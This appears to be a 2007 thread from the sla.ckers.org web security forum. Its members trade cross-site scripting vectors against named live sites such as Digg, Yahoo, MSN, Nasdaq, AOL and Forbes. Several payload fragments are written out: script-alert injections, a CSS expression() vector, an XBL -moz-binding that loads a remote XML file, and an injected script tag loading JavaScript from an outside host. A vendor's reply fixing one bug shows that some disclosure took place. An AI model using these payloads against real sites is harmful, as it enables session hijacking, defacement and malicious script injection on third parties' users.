Paid Advertising

SLA.CKERS.ORG
HA.CKERS SLACKING
sla.ckers.org web application security lab forums
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Re: So it begins
Posted by: Kyran (IP Logged)
Date: April 16, 2007 10:17PM

Even easier.
[www.leapfish.com]

- Kyran

Re: So it begins
Posted by: trev (IP Logged)
Date: April 17, 2007 09:30AM

Kyran, that's Firefox only (and then not even Firefox 3.0 alphas). I gave the other variant because it will work in all browsers.



Edited 1 time(s). Last edit at 04/17/2007 09:31AM by trev.

Re: So it begins
Posted by: Kyran (IP Logged)
Date: April 17, 2007 01:34PM

Actually, it works fine in Opera.
And with only a slight edit, it works in IE.
[www.leapfish.com]

- Kyran

Re: So it begins
Posted by: trev (IP Logged)
Date: April 19, 2007 09:22PM

Self-made XSS on Yahoo (have to click the ad):

[eur.a1.yimg.com]

Originally this was clickTAG=javascript:bfss_doGetURL(...) - that's what they have on Yahoo's main page. Unbelievable...



Edited 4 time(s). Last edit at 04/23/2007 07:14PM by trev.

Re: So it begins
Posted by: digi7al64 (IP Logged)
Date: April 19, 2007 11:25PM

302 - Firefox only

[search.news.com]');

----------
'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Re: So it begins
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 20, 2007 06:31AM

you have typo should be [search.news.com]

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Re: So it begins
Posted by: Awesome AnDrEw (IP Logged)
Date: April 20, 2007 06:21PM

NSFW:
[www.bankrate.com]

NSFW:
[www.royaltyfreehd.com]"http://www.awesomeandrew.net/fd/stock.js"></script>

http://www.awesomeandrew.net/images/banner/88x317.gif
Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
[www.awesomeandrew.net]

Re: So it begins
Posted by: Ghozt (IP Logged)
Date: April 20, 2007 06:49PM


Re: So it begins
Posted by: ma1 (IP Logged)
Date: April 20, 2007 08:15PM

Ghozt Wrote:
-------------------------------------------------------
> [apidoc.digg.com]
> tyle%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%
> 2Fha.ckers.org%2Fxssmoz.xml%23xss%29;
Couldn't make it work on Firefox (where it belongs), not sure why, but this variant did work with IE:

[apidoc.digg.com]

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript

Re: So it begins
Posted by: [k] (IP Logged)
Date: April 21, 2007 09:24AM

ma1 Wrote:
-------------------------------------------------------
> Ghozt Wrote:
> --------------------------------------------------
> -----
> >
> [apidoc.digg.com]
>
> >
> tyle%3D%22-moz-binding%2F**%2F%3Aurl%28http%3A%2F%
>
> > 2Fha.ckers.org%2Fxssmoz.xml%23xss%29;
> Couldn't make it work on Firefox (where it
> belongs), not sure why, but this variant did work
> with IE:
>
> [apidoc.digg.com]%
> 20style%3D%22color:%20expression%28document.title%
> 3D%27xss%27%29

Not sure what you were trying to do, but this works in IE, FF and Opera:

[apidoc.digg.com]

Added a dead input tag to hide the maxlength attribute on the search box that gets orphaned on the injection.

Re: So it begins
Posted by: beford (IP Logged)
Date: April 22, 2007 01:51AM

> Not sure what you were trying to do, but this
> works in IE, FF and Opera:
>
> [apidoc.digg.com]%
> 3e%3cscript%3ealert(1)%3c/script%3e%3cinput
>
> Added a dead input tag to hide the maxlength
> attribute on the search box that gets orphaned on
> the injection.

Looks like apidoc.digg.com is using a WikiLike software from www.pbwiki.com

I'll quote something from their site (http://pbwiki.com/biz.html)
"Most IP theft and security issues happen behind the firewall, where security tends to be lax. We're fanatical about security. "

[mrlindsay.pbwiki.com]

I've just done what I think its right, and sent them a mail with a link to this thread.

PD: A couple of msn.com XSS

[photo.be.msn.com]
[soittoaanet.fi.msn.com]
[photo.be.msn.com]

Re: So it begins
Posted by: ma1 (IP Logged)
Date: April 22, 2007 05:58AM

[k] Wrote:

> Not sure what you were trying to do
Ghozt tried to include an external script using XBL (Gecko based browsers), I "tried" to run a MS-proprietary CSS JS expression, which was the morphologically most similar translation for IE, i.e. script execution from a CSS inline attribute.
If you didn't notice, it changes the document title but should do as well anything else, I just didn't want to lock your browser with infinite alerts and was too lazy to include a run-once flag check.

It was just for fun, your vector is the most universal and obvious - obviously ;)

--
*hackademix.net*

There's a browser safer than Firefox... Firefox, with NoScript



Edited 1 time(s). Last edit at 04/22/2007 06:00AM by ma1.

Re: So it begins
Posted by: [k] (IP Logged)
Date: April 22, 2007 08:44AM

Ah right, gotcha. Interesting in some scenarious, could be useful. I like the idea of browser-specific exploits, I just haven't found a direct use for one. I can think of some scenarios, but only in a highly-focussed attack.

Re: So it begins
Posted by: Henaro (IP Logged)
Date: April 22, 2007 11:21AM

[search3.webfeat.org]

Found this while doing a research paper for lit. W.H. Auden is a punk bitch. I hate poems. :(

"Pessimistic analogy revolving around life."

Re: So it begins
Posted by: pbwiki (IP Logged)
Date: April 22, 2007 03:19PM

Thanks for pointing these XSS issues out. We're going to fix those pronto. If you find other security issues, we'd love to hear from you directly. You can email me (David Weekly, the CEO of PBwiki) at david@pbwiki.com to make sure it's brought immediately to my attention.

Thanks for helping us build a more secure product!

-David

Re: So it begins
Posted by: pbwiki (IP Logged)
Date: April 22, 2007 03:29PM

The FindPage XSS issue pointed out here is now fixed in production. Please let me know if you find others. :)

Re: So it begins
Posted by: Awesome AnDrEw (IP Logged)
Date: April 22, 2007 04:30PM

rsnake Wrote:
-------------------------------------------------------
> [www.nasdaq.com];
> sitesubtype=&email=%22%3E%3Cscript%3Ealert(%22XSS%
> 22)%3C/script%3E&name=&submit=Submit
Found this one when I saw how bad a certain stock was sucking last night.
[quotes.nasdaq.com]"><script>alert(1);</script>&selected=ASS

http://www.awesomeandrew.net/images/banner/88x317.gif
Awesome AnDrEw - That's The Sound Of Your Brain Crackin'
[www.awesomeandrew.net]

Re: So it begins
Posted by: FR3DC3RV (IP Logged)
Date: April 23, 2007 12:43PM

[www.edirectsoftware.com]

[www.min-edu.pt]

-------------------------------
[fr3dc3rv.blogspot.com]

Re: So it begins
Posted by: [k] (IP Logged)
Date: April 23, 2007 01:22PM

[fr.rpmfind.net]

Didn't bother cleaning up. This one triggers twice;one when breaking out of the input and again when it is echoed to the page. It is also written to the title tag.

There are three inputs on the page, all of which have the same vulnerability.

another ones
Posted by: iota (IP Logged)
Date: April 24, 2007 11:19AM


Re: So it begins
Posted by: CrYpTiC_MauleR (IP Logged)
Date: April 25, 2007 06:57PM

[www.mininova.org]
[www.torrentspy.com]
[thepiratebay.org]
[www.onlytorrents.com]

torrents!

________________________________________________________________________
www.crypticmauler.com
"You must be the change you wish to see in the world."

Re: So it begins
Posted by: christ1an (IP Logged)
Date: April 26, 2007 01:28PM

There are various vulns on forbes...
[search.forbes.com]

Regards,
- [christ1an.blogspot.com]

_______________________
[php-ids.org] Web Application Security 2.0

Re: So it begins
Posted by: thornmaker (IP Logged)
Date: April 27, 2007 12:11AM

with search history enabled: [search.aol.com]
after following link, perform any other search with the search history still turned on and vector will fire



Edited 1 time(s). Last edit at 04/27/2007 12:17AM by thornmaker.

Re: So it begins
Posted by: Secks (IP Logged)
Date: April 29, 2007 04:56PM

[www.wweshop.com]

It will echo anything you put. No filtering what so ever.

Re: So it begins
Posted by: thornmaker (IP Logged)
Date: April 29, 2007 10:56PM


Re: So it begins
Posted by: [k] (IP Logged)
Date: April 30, 2007 11:29AM


Re: So it begins
Posted by: rsnake (IP Logged)
Date: April 30, 2007 12:38PM

From an anonymous lurker:

[www.cenzic.com]

[www.qualys.com]

- RSnake
Gotta love it. http://ha.ckers.org

Re: So it begins
Posted by: Secks (IP Logged)
Date: May 01, 2007 04:35PM

Theres a lot more than this, but yeah:

[www.dnscoop.com]
[www.dnscoop.com]



Edited 1 time(s). Last edit at 05/01/2007 04:36PM by Secks.

Re: So it begins
Posted by: blad3 (IP Logged)
Date: May 02, 2007 03:32AM

In the light of the recent digg riot against censoring the HD-DVD key, it would be funny to find some XSS on hddvd homepage and insert the number on their own page :P

I didn't managed to find one. Maybe others are more lucky.
[www.hddvdprg.com]

Re: So it begins
Posted by: trev (IP Logged)
Date: May 02, 2007 06:22AM

That should be difficult. Google find only one dynamic web page there: [www.hddvdprg.com]. And they don't even use JavaScript.



Sorry, only registered users may post in this forum.